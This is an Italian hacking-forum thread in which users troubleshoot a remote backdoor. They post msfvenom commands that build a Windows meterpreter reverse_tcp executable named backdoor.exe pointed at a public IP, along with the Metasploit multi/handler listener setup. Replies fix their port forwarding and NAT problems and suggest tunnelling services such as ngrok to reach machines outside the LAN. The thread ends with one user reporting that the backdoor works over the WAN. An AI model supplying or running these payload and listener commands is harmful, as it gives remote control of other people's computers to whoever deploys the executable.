Domanda Risolto Malware Backdoor e PortForwarding.

Stato
Discussione chiusa ad ulteriori risposte.
Scusami se te lo dico ma dove lo hai visto questo IP oscurato? Io non ho oscurato nulla se mi fai vedere cosa ho oscurato te ne sarei grato
Port.PNG


Questo non è un IP completo, se non è stato oscurato allora è inserito in maniera errata, se invece è stato oscurato non era necessario poichè è un IP privato e non pubblico.

Che c'entra ora? Noi vogliamo solo capire come si facciano queste backdoor dato che è da troppo tempo che ci proviamo ma non riusciamo
E piuttosto sapresti dirci come togliere la macchina virtuale sotto NAT? Dalle spunte delle opzioni?
Centra che state facendo cose a caso senza capire realmente cosa stia succedendo. State usando una macchina virtuale senza sapere se sia in NAT o no, state facendo delle regole di forwarding senza sapere se la configurazione funzioni o meno.
"capire come si facciano queste backdoor" lo avete già capito, i comandi sono quelli, il problema è che non capite come farle funzionare, perchè appunto non conoscete il funzionamento degli strumenti che state usando.

Il mio supporto finisce qui, avete trovato gli errori e avete capito cosa non va. Ora sta a voi usare google (perchè si tratta solamente di quello) e riuscire a far funzionare il tutto
 
Ovviamente sì, devi per forza fare il forwarding altrimenti come può un pc fuori dalla LAN contattare un computer in LAN? Il router non saprebbe come gestire le connessioni, perciò deve essere istruito a "smaltire" le connessioni che gli arrivano sulle varie porte ai diretti interessati.

e soprattutto devo inserire host e porta (nella creazione della backdoor) in base a qualche parametro del mio modem?
sulla porta hai libertà di scelta, l'IP deve ovviamente essere quello pubblico
 
  • Mi piace
Reazioni: Domoho

Domoho

Utente Bronze
17 Dicembre 2020
25
10
7
22
Ultima modifica:
buonasera a tutti, è sempre un piacere ritornare qui ;)
sono un po freddino e ho bisogno di qualche dritta sul portforwarding e sulle backdoor.
vorrei fare un po di test a distanza con delle backdoor, ricordo però che se non ho il portforwarding attivo non è possibile comandarle a distanza, mi sbaglio?
e soprattutto devo inserire host e porta (nella creazione della backdoor) in base a qualche parametro del mio modem?
grazie in anticipo :)
(modifica: porta rischi attivare il portforwarding??)
 
Ovviamente sì, devi per forza fare il forwarding altrimenti come può un pc fuori dalla LAN contattare un computer in LAN? Il router non saprebbe come gestire le connessioni, perciò deve essere istruito a "smaltire" le connessioni che gli arrivano sulle varie porte ai diretti interessati.


sulla porta hai libertà di scelta, l'IP deve ovviamente essere quello pubblico
ok grazie mille, ieri ho aperto tutte le porte che potevo aprire sul pannello di controllo del modem (TP-LINK), continua a non funzionare, una volta che faccio aprire la backdoor a un mio amico (ovviamente a distanza e consenziente ahah) non ricevo nessun segnale, invece se lo apro io (connesso alla mia rete) non da nessun problema, non riesco a capire se il problema è stata dalla creazione della backdoor o magari io che abbia sbagliato a fare il forwarding :(
 
ok grazie mille, ieri ho aperto tutte le porte che potevo aprire sul pannello di controllo del modem (TP-LINK), continua a non funzionare, una volta che faccio aprire la backdoor a un mio amico (ovviamente a distanza e consenziente ahah) non ricevo nessun segnale, invece se lo apro io (connesso alla mia rete) non da nessun problema, non riesco a capire se il problema è stata dalla creazione della backdoor o magari io che abbia sbagliato a fare il forwarding :(
se scrivi i comandi che hai dato per creare la backdoor e per metterti in ascolto possiamo cercare l'errore.

Con quale gestore internet hai il contratto?
 
scrivi tutti i comandi qua sotto e vediamo
Allora dimmi se ho sbagliato qualcosa nel settare l'ip statico sulla macchina attacante cioè linux. Ho eseguito i seguenti comandi:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]

ma nulla quando apre il .exe non si apre nessuna sessione.
Messaggio unito automaticamente:

scrivi tutti i comandi qua sotto e vediamo
Purtroppo sono sotto NAT e non posso fare la backdoor, come posso ovviare a questo problema? Grazie
 
scrivi tutti i comandi qua sotto e vediamo
Ciao io e chry stiamo testando queste backdoor tra di noi,dopo aver settato ip statico aver forwardato le porte e il tutto non si apre nessuna sessione,non sono sotto NAT e ti elenco tutti i comandi che ho utilizzato:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]
 
Allora dimmi se ho sbagliato qualcosa nel settare l'ip statico sulla macchina attacante cioè linux. Ho eseguito i seguenti comandi:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]

ma nulla quando apre il .exe non si apre nessuna sessione.
Messaggio unito automaticamente:


Purtroppo sono sotto NAT e non posso fare la backdoor, come posso ovviare a questo problema? Grazie
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
 
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
Come antivirus uso Malwarebytes per quanto riguarda il port forwarding ti allego uno screenshot. Uso vmware come virtual machine come posso verificare se è in nat o in bridge?

Sul port forwarding su HOST lan metto l'ip statico che ho settato su linux
(Il mio gestore è Tim)
 

Allegati

  • Port.PNG
    Port.PNG
    12.4 KB · Visualizzazioni: 49
Come antivirus uso Malwarebytes per quanto riguarda il port forwarding ti allego uno screenshot. Uso vmware come virtual machine come posso verificare se è in nat o in bridge?

Sul port forwarding su HOST lan metto l'ip statico che ho settato su linux
(Il mio gestore è Tim)
Credo che su Host LAN tu debba mettere l'IP completo del tuo PC. Su VMWare devi andare nelle impostazioni della macchina virtuale e verificare come sia impostata l'opzione "scheda di rete"
 
Sei sei sotto NAT temo ci sia ben poco da fare, puoi provare a utilizzare un DDNS oppure servizi come ngrok o http://localhost.run/ ma non sono sicuro si possa fare qualcosa

@LordZSalaZaR i tuoi comandi sono giusti, sei sicuro di aver effettuato correttamente il port forwarding? Non è che hai un firewall o un antivirus che blocca le connessioni sulla macchina che attacchi? La tua Virtual Machine è in NAT o in Bridge?
esatto, abbiamo fatto tutto e ci hanno detto probabilmente che eravamo sotto NAT, consigliandoci di contattare te che sicuramente ne sapevi qualcosa
Messaggio unito automaticamente:

no dico che nella foto che hai mandato c'è scritto un indirizzo IP non intero, devi metterlo completo
l'ip è completo, l'ha solamente oscurato
Messaggio unito automaticamente:

Credo che su Host LAN tu debba mettere l'IP completo del tuo PC. Su VMWare devi andare nelle impostazioni della macchina virtuale e verificare come sia impostata l'opzione "scheda di rete"
c'entra qualcosa questo?
 

Allegati

  • NAT.PNG
    NAT.PNG
    32.3 KB · Visualizzazioni: 33
c'entra qualcosa questo?
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?
 
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?
Che c'entra ora? Noi vogliamo solo capire come si facciano queste backdoor dato che è da troppo tempo che ci proviamo ma non riusciamo
Messaggio unito automaticamente:

E piuttosto sapresti dirci come togliere la macchina virtuale sotto NAT? Dalle spunte delle opzioni?
 
Ovvio, hai la macchina viruale sotto NAT. Prima di giocare a fare le backdoor forse sarebbe meglio capire cosa signifchino queste sigle e cosa sia il NAT, non credete?

Inoltre il fatto che abbiate oscurato l'IP privato mi fa inture che non conosciate nemmeno la differenza tra un IP pubblico e privato... forse e meglio studiare prima un po' di basi?


Scusami se te lo dico ma dove lo hai visto questo IP oscurato? Io non ho oscurato nulla se mi fai vedere cosa ho oscurato te ne sarei grato
 
Visualizza allegato 52265

Questo non è un IP completo, se non è stato oscurato allora è inserito in maniera errata, se invece è stato oscurato non era necessario poichè è un IP privato e non pubblico.


Centra che state facendo cose a caso senza capire realmente cosa stia succedendo. State usando una macchina virtuale senza sapere se sia in NAT o no, state facendo delle regole di forwarding senza sapere se la configurazione funzioni o meno.
"capire come si facciano queste backdoor" lo avete già capito, i comandi sono quelli, il problema è che non capite come farle funzionare, perchè appunto non conoscete il funzionamento degli strumenti che state usando.

Il mio supporto finisce qui, avete trovato gli errori e avete capito cosa non va. Ora sta a voi usare google (perchè si tratta solamente di quello) e riuscire a far funzionare il tutto


Il 192.168 che vedi era solo “Indicativo” per fare un esempio, conosco bene la differenza tra un Ip pubblico e uno privato volevo solo chiarezza nel parametro Host LAN tutto qui. Comunque sono riuscito a farla andare in wan grazie del supporto
Messaggio unito automaticamente:

Quindi non hai inserito l'IP completo?
Era solo “Indicativo” il 192.168 per fare un esempio perché non avevo ben chiaro il parametro Host LAN.
 
Stato
Discussione chiusa ad ulteriori risposte.